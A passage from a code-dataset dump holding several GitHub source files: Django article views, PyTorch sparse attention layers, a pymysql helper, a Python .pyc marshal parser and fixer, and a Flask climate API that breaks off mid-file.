      \"\r\n \r\n return HttpResponse(response)\r\n\r\n#editar los articulos\r\ndef editar_articulo(request, id):\r\n articulo = Article.objects.get(pk=id)\r\n \r\n articulo.title = \"Batman\"\r\n articulo.content = \"Pelicula del 2017\"\r\n articulo.public = True\r\n \r\n articulo.save()\r\n \r\n return HttpResponse(f'Articulo Editado: {articulo.title} {articulo.content} {articulo.public}')\r\n\r\ndef create_full_article(request):\r\n \r\n if request.method == 'POST':\r\n formulario = FormArticle(request.POST)\r\n \r\n if formulario.is_valid():\r\n form_data = formulario.cleaned_data\r\n \r\n title = form_data.get('title')\r\n content = form_data['content']\r\n public = form_data['public']\r\n \r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n \r\n #crear mensajes flash que solo se muestra una vez\r\n messages.success(request, f'Has creado correctamente el articulo {articulo.id}')\r\n \r\n return redirect('articulos')\r\n else:\r\n formulario = FormArticle()\r\n \r\n return render(request, 'create_full_article.html', {\r\n 'form': formulario\r\n })\r\n\r\ndef articulos(request):\r\n articulos = Article.objects.all().order_by(\"-id\")\r\n \r\n #articulos = Article.objects.filter(title__contains=\"Javascritpt and Python\")\r\n #articulos = Article.objects.filter(title__exact=\"Javascritpt and Python\")\r\n \r\n #mayor a la cantidad \r\n #articulos = Article.objects.filter(id__gt=17)\r\n \r\n ##mayor o igual\r\n #articulos = Article.objects.filter(id__gte=13)\r\n \r\n #menores a la cantidad\r\n # articulos = Article.objects.filter(id__lt=13)\r\n \r\n #menor o igual\r\n #articulos = Article.objects.filter(id__lte=13, title__contains=\"Progrmacion con python\")\r\n '''\r\n articulos = Article.objects.filter(\r\n Q(title__contains=\"11\") | Q(public=False)\r\n )\r\n \r\n articulos = Article.objects.filter(id__gte=10).exclude(public=True)\r\n \r\n articulos = Article.objects.raw(\"SELECT * FROM backend_article WHERE title='Articulo 2' AND public=0\")\r\n '''\r\n return render(request, 'articulos.html', {\r\n 'articulos': articulos\r\n })\r\n \r\ndef borrar_articulo(request, id):\r\n articulo = Article.objects.get(pk=id)\r\n \r\n articulo.delete()\r\n return redirect('articulos')","repo_name":"elOrlin/python","sub_path":"AprendiendoDjango copy/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"283731769","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197):\n super().__init__()\n self.num_heads = num_heads\n self.num_patches = num_patches\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197):\n super().__init__()\n self.num_heads = num_heads\n self.num_patches = num_patches\n head_dim = dim // num_heads\n self.dim = dim\n self.scale = qk_scale or head_dim ** -0.5\n\n self.q = nn.Linear(dim, dim, bias=qkv_bias)\n self.k = nn.Linear(dim, dim, bias=qkv_bias)\n self.v = nn.Linear(dim, dim, bias=qkv_bias)\n \n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, q,k,v,attn_mask=None):\n \n q = q.permute(1,0,2)\n k = k.permute(1,0,2)\n v = v.permute(1,0,2)\n \n \n B,N_q,N_k,N_v,C = q.shape[0],q.shape[1],k.shape[1],v.shape[1],q.shape[2]\n \n \n q = self.q(q).reshape(B, N_q, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n k = self.k(k).reshape(B, N_k, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n v = self.v(v).reshape(B, N_v, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n\n \n# print(q.shape,k.shape,v.shape)\n if attn_mask is not None:\n attn_mask = attn_mask.to(torch.bool)\n\n attn_mask = attn_mask.view(B, 1, 1, N_k).expand(-1, self.num_heads, -1, -1).reshape(B*self.num_heads, 1, N_k)\n\n new_attn_mask = torch.zeros_like(attn_mask, dtype=q.dtype)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n \n \n if attn_mask is not None:\n attn = torch.baddbmm(attn_mask, q.reshape(B*self.num_heads,N_q,C // self.num_heads), k.reshape(B*self.num_heads,N_k,C // self.num_heads).transpose(-2, -1)) * self.scale\n attn = attn.reshape(B,self.num_heads,N_q,N_k)\n \n else:\n attn = (q @ k.transpose(-2, -1)) * self.scale\n \n attn = attn.softmax(dim=-1)\n \n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N_q, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n x = x.permute(1,0,2)\n return x \n\n# dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197 \nclass MultiHeadSparseAttention(MultiHeadAttention):\n def __init__(self, attn_module, head_search=False, uniform_search=False):\n super().__init__(attn_module.q.in_features, attn_module.num_heads, True, attn_module.scale, attn_module.attn_drop.p, attn_module.proj_drop.p)\n self.is_searched = False\n self.num_gates = attn_module.q.in_features // self.num_heads\n if head_search and not uniform_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, 1))\n elif uniform_search and not head_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, 1, 1, self.num_gates))\n elif head_search and uniform_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, self.num_gates))\n else:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, self.num_gates))\n \n self.searched_zeta = torch.ones_like(self.zeta)\n \n self.patch_zeta = nn.Parameter(torch.ones(1, self.num_patches, 1)*3)\n self.searched_patch_zeta = torch.ones_like(self.patch_zeta)\n self.patch_activation = nn.Tanh()\n \n def forward(self,q,k,v,attn_mask=None):\n q = q.permute(1,0,2)\n k = k.permute(1,0,2)\n v = v.permute(1,0,2)\n \n z = self.searched_zeta if self.is_searched else self.zeta\n \n B,N_q,N_k,N_v,C = q.shape[0],q.shape[1],k.shape[1],v.shape[1],q.shape[2]\n \n q = self.q(q).reshape(B, N_q, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n k = self.k(k).reshape(B, N_k, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n v = self.v(v).reshape(B, N_v, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n \n q = (q*z)[0]\n k = (k*z)[0]\n v = (v*z)[0]\n \n if attn_mask is not None:\n attn_mask = attn_mask.to(torch.bool)\n\n attn_mask = attn_mask.view(B, 1, 1, N_k).expand(-1, self.num_heads, -1, -1).reshape(B*self.num_heads, 1, N_k)\n\n new_attn_mask = torch.zeros_like(attn_mask, dtype=q.dtype)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n \n \n if attn_mask is not None:\n attn = torch.baddbmm(attn_mask, q.reshape(B*self.num_heads,N_q,C // self.num_heads), k.reshape(B*self.num_heads,N_k,C // self.num_heads).transpose(-2, -1)) * self.scale\n attn = attn.reshape(B,self.num_heads,N_q,N_k)\n \n else:\n attn = (q @ k.transpose(-2, -1)) * self.scale\n \n attn = attn.softmax(dim=-1)\n \n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N_q, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n x = x.permute(1,0,2)\n return x\n \n def get_zeta(self):\n return self.zeta.cuda(), self.patch_activation(self.patch_zeta).cuda()\n \n def compress(self, threshold_attn):\n self.is_searched = True\n self.searched_zeta = (self.zeta>=threshold_attn).float().cuda()\n self.zeta.requires_grad = False\n \n def compress_patch(self, threshold_patch=None, zetas=None):\n self.is_searched = True\n zetas = torch.from_numpy(zetas).reshape_as(self.patch_zeta)\n self.searched_patch_zeta = (zetas).float().to(self.zeta.device)\n self.patch_zeta.requires_grad = False\n\n def decompress(self):\n self.is_searched = False\n self.zeta.requires_grad = True\n self.patch_zeta.requires_grad = True\n\n def get_params_count(self):\n dim = self.q.in_features\n active = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1:\n active*=self.num_gates\n elif self.zeta.shape[2] == 1:\n active*=self.num_heads\n total_params = dim*dim*3 + dim*3\n total_params += dim*dim + dim\n active_params = dim*active*3 + active*3\n active_params += active*dim +dim\n return total_params, active_params\n \n def get_flops_s(self,num_patches_query,num_patches_key):\n H = self.num_heads\n N_q = num_patches_query\n N_k = num_patches_key\n d = self.num_gates\n sd = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1: # Head Elimination\n sd*=self.num_gates\n elif self.zeta.shape[2] == 1: # Uniform Search\n sd*=self.num_heads\n total_flops = N_q * (H*d * (H*d)) + N_q*H*d #linear q\n total_flops += 2*(N_k * (H*d * (H*d)) + N_k*H*d) #linear k and v\n# total_flops = N * (H*d * (3*H*d)) + 3*N*H*d #linear: qkv\n total_flops += H*N_q*d*N_k + H*N_q*N_k #q@k\n total_flops += 5*H*N_q*N_k #softmax\n total_flops += H*N_q*N_k*d #attn@v\n total_flops += N_q * (H*d * (H*d)) + N_q*H*d #linear: proj\n \n return total_flops\n \n def get_flops(self, num_patches, active_patches):\n H = self.num_heads\n N = num_patches\n n = active_patches\n d = self.num_gates\n sd = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1: # Head Elimination\n sd*=self.num_gates\n elif self.zeta.shape[2] == 1: # Uniform Search\n sd*=self.num_heads\n total_flops = N * (H*d * (3*H*d)) + 3*N*H*d #linear: qkv\n total_flops += H*N*d*N + H*N*N #q@k\n total_flops += 5*H*N*N #softmax\n total_flops += H*N*N*d #attn@v\n total_flops += N * (H*d * (H*d)) + N*H*d #linear: proj\n \n active_flops = n * (H*d * (3*sd)) + 3*n*sd #linear: qkv\n active_flops += n*n*sd + H*n*n #q@k\n active_flops += 5*H*n*n #softmax\n active_flops += n*n*sd #attn@v\n active_flops += n * (sd * (H*d)) + n*H*d #linear: proj\n return total_flops, active_flops\n\n @staticmethod\n def from_attn(attn_module, head_search=False, uniform_search=False):\n attn_module = MultiHeadSparseAttention(attn_module, head_search, uniform_search)\n return attn_module\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer='gelu', drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = _get_activation_fn(act_layer)\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n# x = self.drop(x)\n return x\n\nclass SparseMlp(Mlp):\n def __init__(self, mlp_module):\n super().__init__(mlp_module.fc1.in_features, mlp_module.fc1.out_features, mlp_module.fc2.out_features, act_layer='gelu', drop=mlp_module.drop.p)\n self.is_searched = False\n self.num_gates = mlp_module.fc1.out_features\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_gates))\n self.searched_zeta = torch.ones_like(self.zeta) \n \n def forward(self, x, patch_zeta=None):\n if patch_zeta is not None:\n x*=patch_zeta\n z = self.searched_zeta if self.is_searched else self.get_zeta()\n x = self.fc1(x)\n x = self.act(x)\n x *= z # both fc1 and fc2 dimensions eliminated here\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n \n def get_zeta(self):\n return self.zeta.cuda()\n \n def compress(self, threshold):\n self.is_searched = True\n self.searched_zeta = (self.get_zeta()>=threshold).float().cuda()\n self.zeta.requires_grad = False\n\n def decompress(self):\n self.is_searched = False\n self.zeta.requires_grad = True\n\n def get_params_count(self):\n dim1 = self.fc1.in_features\n dim2 = self.fc1.out_features\n active_dim2 = self.searched_zeta.sum().data\n total_params = 2*(dim1*dim2) + dim1 + dim2\n active_params = 2*(dim1*active_dim2) + dim1 + active_dim2\n return total_params, active_params\n \n def get_flops(self, num_patches, active_patches):\n total_params, active_params = self.get_params_count()\n return total_params*num_patches, active_params*active_patches\n\n @staticmethod\n def from_mlp(mlp_module):\n mlp_module = SparseMlp(mlp_module)\n return mlp_module\n \ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n \n\nclass ModuleInjection:\n method = 'search'\n searchable_modules = []\n\n @staticmethod\n def make_searchable_attn(attn_module, head_search=False, uniform_search=False):\n if ModuleInjection.method == 'full':\n return attn_module\n attn_module = MultiHeadSparseAttention.from_attn(attn_module, head_search, uniform_search)\n ModuleInjection.searchable_modules.append(attn_module)\n# print(attn_module)\n return attn_module\n\n @staticmethod\n def make_searchable_mlp(mlp_module):\n if ModuleInjection.method == 'full':\n return mlp_module\n mlp_module = SparseMlp.from_mlp(mlp_module)\n ModuleInjection.searchable_modules.append(mlp_module)\n# print(mlp_module)\n# print(ModuleInjection.searchable_modules)\n return mlp_module","repo_name":"transmuteAI/Light-Weight-Trackers","sub_path":"Stark_sparse/lib/models/stark/slim_layers.py","file_name":"slim_layers.py","file_ext":"py","file_size_in_byte":13094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"21017902074","text":"import pymysql\nfrom Common.Constant import Constant\n\ndef getDB():\n try:\n conn = pymysql.connect(host=Constant.DB_HOST, user=Constant.DB_USER, passwd=Constant.DB_PASSWD,charset='utf8')\n conn.autocommit(True)\n cursor = conn.cursor() # 创建游标对象\n cursor.execute(\"SET NAMES utf8\")\n cursor.execute(\"USE %s\" % Constant.DB_NAME)\n return conn, cursor\n\n except pymysql.Error as e:\n print(\"Mysql Error %d: %s\" % (e.args[0], e.args[1]))\n return None, None\n\ndef getQryData(sql):\n conn, curr = getDB()\n curr.execute(sql)\n datas = curr.fetchall()\n curr.close()\n conn.close()\n return datas\n\ndef getPriceQryPeriods():\n sql = \"select START_PRICE start, END_PRICE end from JX3_PRICE_QRY_INFO order by START_PRICE asc\"\n return getQryData(sql)\n\ndef getOrignPeriods(batchInfo=\"\"):\n if(batchInfo != \"\"):\n batchInfo = f\"where BATCH_ID = {batchInfo}\".format(batchInfo)\n sql = f\"select START_PRICE start, END_PRICE end from JX3_PRICE_QRY_INFO {batchInfo} order by START_PRICE asc\".format(batchInfo)\n return getQryData(sql)\n\n\n","repo_name":"sengeiou/zzpes","sub_path":"zzpes-python/Common/DbHelper.py","file_name":"DbHelper.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"883085289","text":"import argparse\nimport binascii\nimport sys\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple\n\nfrom .bits import bytes_to_float, bytes_to_int, clearBit, testBit\nfrom .magic import get_pyc_header_lenght, get_pyc_python_version\nfrom .object_types import types\n\nPyLong_MARSHAL_SHIFT = 15\n\nDEBUG = False\n\n# Flag_ref = namedtuple(\"Flag_ref\", [\"byte\", \"type\", \"content\", \"usages\"])\nReference = namedtuple(\"Reference\", [\"byte\", \"index\"])\n\n\n@dataclass\nclass Flag_ref:\n byte: int\n type: str\n content: object\n usages: int = 0\n\n\nclass MarshalParser:\n def __init__(self, filename: Path):\n self.filename = filename\n\n with open(filename, \"rb\") as fh:\n self.bytes = bytes(fh.read())\n if len(self.bytes) < 4:\n raise RuntimeError(f\"File {self.filename} is empty!\")\n iterator = enumerate(self.bytes)\n # if pyc magic number is detected, skip entire\n # pyc header (first n bytes)\n self.python_version = get_pyc_python_version(bytes=self.bytes[:4])\n if self.python_version:\n pyc_header_len = get_pyc_header_lenght(self.python_version)\n for x in range(pyc_header_len):\n next(iterator)\n else:\n # Not a pyc file, parse it as a marshal dump without header\n if DEBUG:\n print(\n \"File has no or unknown pyc header, \"\n \"assuming a marshal dump…\"\n )\n\n self.iterator = iterator\n\n def parse(self) -> None:\n self.references: List[\n Reference\n ] = [] # references to existing objects with FLAG_REF\n self.flag_refs: List[Flag_ref] = [] # objects with FLAG_REF on\n self.output = \"\"\n self.indent = 0\n self.read_object()\n\n def record_object_start(\n self, i: int, b: int, ref_id: Optional[int]\n ) -> None:\n \"\"\"\n Records human readable output of parsing process\n \"\"\"\n byte = binascii.hexlify(b.to_bytes(1, \"little\"))\n bytestring = b.to_bytes(1, \"little\")\n type = types[bytestring]\n ref = \"\"\n if ref_id is not None:\n ref = f\"REF[{ref_id}]\"\n line = (\n f\"n={i}/{hex(i)} byte=({byte!r}, {bytestring!r}, \"\n f\"{bin(b)}) {type} {ref}\\n\"\n )\n if DEBUG:\n print(line)\n self.output += \" \" * self.indent + line\n\n def record_object_result(self, result: Any) -> None:\n \"\"\"\n Records the result of object parsing with its type\n \"\"\"\n line = f\"result={result}, type={type(result)}\\n\"\n self.output += \" \" * self.indent + line\n\n def record_object_info(self, info: str) -> None:\n \"\"\"\n Records some info about parsed object\n \"\"\"\n line = f\"{info}\\n\"\n self.output += \" \" * self.indent + line\n\n def read_object(self) -> Any:\n \"\"\"\n Main method for reading/parsing objects and recording references.\n Simple objects are parsed directly, complex uses other read_* methods\n \"\"\"\n i, b = next(self.iterator)\n ref_id = None\n if testBit(b, 7):\n b = clearBit(b, 7)\n # Save a slot in global references\n ref_id = len(self.flag_refs)\n self.flag_refs.append(None) # type: ignore\n\n bytestring = b.to_bytes(1, \"little\")\n try:\n type = types[bytestring]\n except KeyError:\n print(\n f\"Cannot read/parse byte {b!r} {bytestring!r} on possition {i}\"\n )\n print(\"Might be error or unsupported TYPE\")\n print(self.output)\n sys.exit(1)\n self.record_object_start(i, b, ref_id)\n\n # Increase indentation\n self.indent += 2\n\n result: Any\n\n if type == \"TYPE_CODE\":\n result = self.read_codeobject()\n\n elif type == \"TYPE_LONG\":\n result = self.read_py_long()\n\n elif type in (\"TYPE_INT\"):\n result = self.read_long()\n\n elif type in (\n \"TYPE_STRING\",\n \"TYPE_UNICODE\",\n \"TYPE_ASCII\",\n \"TYPE_INTERNED\",\n \"TYPE_ASCII_INTERNED\",\n ):\n result = self.read_string()\n\n elif type == \"TYPE_SMALL_TUPLE\":\n # small tuple — size is only one byte\n size = bytes_to_int(self.read_bytes())\n self.record_object_info(f\"Small tuple size: {size}\")\n result = []\n for x in range(size):\n result.append(self.read_object())\n result = tuple(result)\n\n elif type in (\"TYPE_TUPLE\", \"TYPE_LIST\", \"TYPE_SET\", \"TYPE_FROZENSET\"):\n # regular tuple, list, set, frozenset\n size = self.read_long()\n self.record_object_info(f\"tuple/list/set size: {size}\")\n result = []\n for x in range(size):\n result.append(self.read_object())\n if type == \"TYPE_TUPLE\":\n result = tuple(result)\n elif type == \"TYPE_SET\":\n result = set(result)\n elif type == \"TYPE_FROZENSET\":\n result = frozenset(result)\n\n elif type == \"TYPE_NULL\":\n result = \"null\"\n\n elif type == \"TYPE_NONE\":\n result = None\n\n elif type == \"TYPE_TRUE\":\n result = True\n\n elif type == \"TYPE_FALSE\":\n result = False\n\n elif type == \"TYPE_STOPITER\":\n result = StopIteration\n\n elif type == \"TYPE_ELLIPSIS\":\n result = ...\n\n elif type in (\"TYPE_SHORT_ASCII_INTERNED\", \"TYPE_SHORT_ASCII\"):\n result = self.read_string(short=True)\n\n elif type == \"TYPE_REF\":\n index = self.read_long()\n self.references.append(Reference(byte=i, index=index))\n self.flag_refs[index].usages += 1\n if len(str(self.flag_refs[index])) > 500:\n result = f\"REF to {index} (value omitted)\"\n else:\n result = f\"REF to {index}: {self.flag_refs[index]}\"\n\n elif type == \"TYPE_BINARY_FLOAT\":\n result = bytes_to_float(self.read_bytes(count=8))\n\n elif type == \"TYPE_BINARY_COMPLEX\":\n real = bytes_to_float(self.read_bytes(count=8))\n imag = bytes_to_float(self.read_bytes(count=8))\n result = complex(real, imag)\n\n elif type == \"TYPE_DICT\":\n result = {}\n while True:\n key = self.read_object()\n if key == \"null\":\n break\n value = self.read_object()\n result[key] = value\n\n # decrease indentation\n self.indent -= 2\n try:\n self.record_object_result(result)\n except UnboundLocalError:\n message = f\"type [{type}] is recognized but result is not present.\"\n if not self.python_version:\n message += (\n \"\\nThe error is probably caused by an unknown \"\n \"Python version (magic number) if it's a pyc file.\"\n )\n raise RuntimeError(message) from None\n\n # Save the result to the self.references\n if ref_id is not None:\n self.flag_refs[ref_id] = Flag_ref(\n byte=i, type=type, content=result\n )\n\n return result\n\n def read_bytes(self, count: int = 1) -> bytes:\n bytes = b\"\"\n for x in range(count):\n index, int_byte = next(self.iterator)\n byte = int_byte.to_bytes(1, \"little\")\n bytes += byte\n return bytes\n\n def read_string(\n self, size: Optional[int] = None, short: bool = False\n ) -> bytes:\n if size is None:\n if short:\n # short == size is stored as one byte\n size = bytes_to_int(self.read_bytes())\n else:\n # non-short == size is stored as long (4 bytes)\n size = self.read_long()\n bytes = self.read_bytes(size)\n return bytes\n\n def read_long(self, signed: bool = False) -> int:\n bytes = self.read_bytes(count=4)\n return bytes_to_int(bytes, signed=signed)\n\n def read_short(self) -> int:\n b = self.read_bytes(count=2)\n x = b[0]\n x |= b[1] << 8\n # Sign-extension, in case short greater than 16 bits\n x |= -(x & 0x8000)\n return x\n\n def read_py_long(self) -> int:\n n = self.read_long(signed=True)\n result, shift = 0, 0\n for i in range(abs(n)):\n result += self.read_short() << shift\n shift += PyLong_MARSHAL_SHIFT\n\n return result if n > 0 else -result\n\n def set_codeobject_structure(self) -> None:\n \"\"\"Sets self.codeobject_structure representing codeobject\n structure for given Python version\"\"\"\n\n if (\n hasattr(self, \"codeobject_structure\")\n or self.python_version is None\n ):\n return\n\n # Contains all possible code object attributes\n # and their respective methods for parsing them\n structure = [\n (\"argcount\", self.read_long),\n (\"posonlyargcount\", self.read_long),\n (\"kwonlyargcount\", self.read_long),\n (\"nlocals\", self.read_long),\n (\"stacksize\", self.read_long),\n (\"flags\", self.read_long),\n (\"code\", self.read_object),\n (\"consts\", self.read_object),\n (\"names\", self.read_object),\n (\"varnames\", self.read_object),\n (\"freevars\", self.read_object),\n (\"cellvars\", self.read_object),\n (\"localsplusnames\", self.read_object),\n (\"localspluskinds\", self.read_object),\n (\"filename\", self.read_object),\n (\"name\", self.read_object),\n (\"qualname\", self.read_object),\n (\"firstlineno\", self.read_long),\n (\"linetable\", self.read_object),\n (\"exceptiontable\", self.read_object),\n ]\n\n self.codeobject_structure = []\n\n # Skips specific attributes based on Python version\n for name, method in structure:\n if self.python_version < (3, 11):\n # Available in 3.11+\n if name in (\n \"localsplusnames\",\n \"localspluskinds\",\n \"qualname\",\n \"exceptiontable\",\n ):\n continue\n else:\n # Removed in 3.11\n if name in (\"nlocals\", \"varnames\", \"freevars\", \"cellvars\"):\n continue\n\n if self.python_version < (3, 8):\n # Available in 3.8+\n if name == \"posonlyargcount\":\n continue\n\n self.codeobject_structure.append((name, method))\n\n if DEBUG:\n from pprint import pprint\n\n print(\"Codeobject structure:\")\n pprint(self.codeobject_structure)\n\n def read_codeobject(self) -> Dict[str, Any]:\n self.set_codeobject_structure()\n\n co = dict()\n for name, method in self.codeobject_structure:\n co[name] = method() # type: ignore\n\n return co\n\n def unused_ref_flags(self) -> List[Tuple[int, Flag_ref]]:\n unused = []\n for index, flag_ref in enumerate(self.flag_refs):\n if flag_ref.usages == 0:\n unused.append((index, flag_ref))\n return unused\n\n def clear_unused_ref_flags(self, overwrite: bool = False) -> None:\n # List of flag_refs and references ordered by number of byte in a file\n final_list = self.flag_refs + self.references\n final_list.sort(key=lambda x: x.byte)\n # a map where at a beginning, index in list == number of flag_ref\n # but when unused flag is removed:\n # - numbers in the list are original numbers of flag_refs\n # - indexes of the list are new numbers\n flag_ref_map = list(range(len(self.flag_refs)))\n # new mutable content\n content = bytearray(self.bytes)\n\n removed_count = 0\n for r in final_list:\n if isinstance(r, Flag_ref) and r.usages == 0:\n # Clear FLAG_REF bit and remove it from map\n # all subsequent refs will have lower index in the map\n flag_ref_map.remove(self.flag_refs.index(r))\n content[r.byte] = clearBit(content[r.byte], 7)\n removed_count += 1\n elif isinstance(r, Reference):\n # Find a new index of flag_ref after some was removed\n new_index = flag_ref_map.index(r.index)\n # write new number as 4-byte integer\n content[r.byte + 1 : r.byte + 5] = new_index.to_bytes(\n 4, \"little\"\n )\n\n # Skip writing if there is no difference\n if bytes(content) != self.bytes:\n if overwrite:\n suffix = \"\"\n else:\n suffix = \".fixed\"\n\n new_name = self.filename.with_suffix(suffix + self.filename.suffix)\n print(f\"Removed {removed_count} unused FLAG_REFs from {new_name}\")\n\n with open(new_name, mode=\"wb\") as fh:\n fh.write(content)\n else:\n print(f\"No unused FLAG_REFs in {self.filename}\")\n\n\ndef main() -> None:\n arg_parser = argparse.ArgumentParser(\n description=\"Marshalparser and fixer for .pyc files\"\n )\n arg_parser.add_argument(\n \"-p\",\n \"--print\",\n action=\"store_true\",\n dest=\"print\",\n default=False,\n help=\"Print human-readable parser output\",\n )\n arg_parser.add_argument(\n \"-u\",\n \"--unused\",\n action=\"store_true\",\n dest=\"unused\",\n default=False,\n help=\"Print unused references\",\n )\n arg_parser.add_argument(\n \"-f\",\n \"--fix\",\n action=\"store_true\",\n dest=\"fix\",\n default=False,\n help=\"Fix references\",\n )\n arg_parser.add_argument(\n \"-o\",\n \"--overwrite\",\n action=\"store_true\",\n dest=\"overwrite\",\n default=False,\n help=\"Overwrite existing pyc file (works with --fix)\",\n )\n arg_parser.add_argument(metavar=\"files\", dest=\"files\", nargs=\"*\")\n\n args = arg_parser.parse_args()\n\n for file in args.files:\n parser = MarshalParser(Path(file))\n parser.parse()\n if args.print:\n print(parser.output)\n if args.unused:\n unused = parser.unused_ref_flags()\n if unused:\n print(\"Unused FLAG_REFs:\")\n print(\"\\n\".join([f\"{i} - {f}\" for i, f in unused]))\n\n if args.fix:\n parser.clear_unused_ref_flags(overwrite=args.overwrite)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fedora-python/marshalparser","sub_path":"marshalparser/marshalparser.py","file_name":"marshalparser.py","file_ext":"py","file_size_in_byte":14909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"17419957259","text":"# SQL Alchemy Challenge!\nfrom flask import Flask, jsonify\nimport numpy as np\nimport datetime as dt\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef welcome():\n return (\n f\"
      Welcome to the Climate API!

      \"\n f\"Available Routes:
      \"\n f\"/api/v1.0/precipitation
      \"\n f\"/api/v1.0/stations
      \"\n f\"/api/v1.0/tobs

      \"\n f\"For these, instead of start_date/end_date, type in date as YYYY-MM-DD:

      \"\n f\"/api/v1.0/start_date
      \"\n f\"/api/v1.0/start_date/end_date\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n return jsonify(results)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n session = Session(engine)\n results = session.query(Station.name).all()\n session.close()\n return jsonify(results)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= '2016-08-23').\\\n filter(Measurement.station == 'USC00519281').all()\n session.close()\n\n return jsonify(results)\n\n@app.route(\"/api/v1.0/\")\ndef trip(start):\n session = Session(engine)\n start_date= dt.datetime.strptime(start, '%Y-%m-%d')\n last_year = dt.timedelta(days=365)\n start = start_date-last_year\n end = dt.date(2017, 8, 23)\n trip_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n trip = list(np.ravel(trip_data))\n return jsonify(trip)\n\n@app.route(\"/api/v1.0//\")\ndef trip_2(start,end):\n session = Session(engine)\n start_date= dt.datetime.strptime(start, '%Y-%m-%d')\n end_date= dt.datetime.strptime(end,'%Y-%m-%d')\n last_year = dt.timedelta(days=365)\n start = start_date-last_year\n end = end_date-last_year\n trip_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n 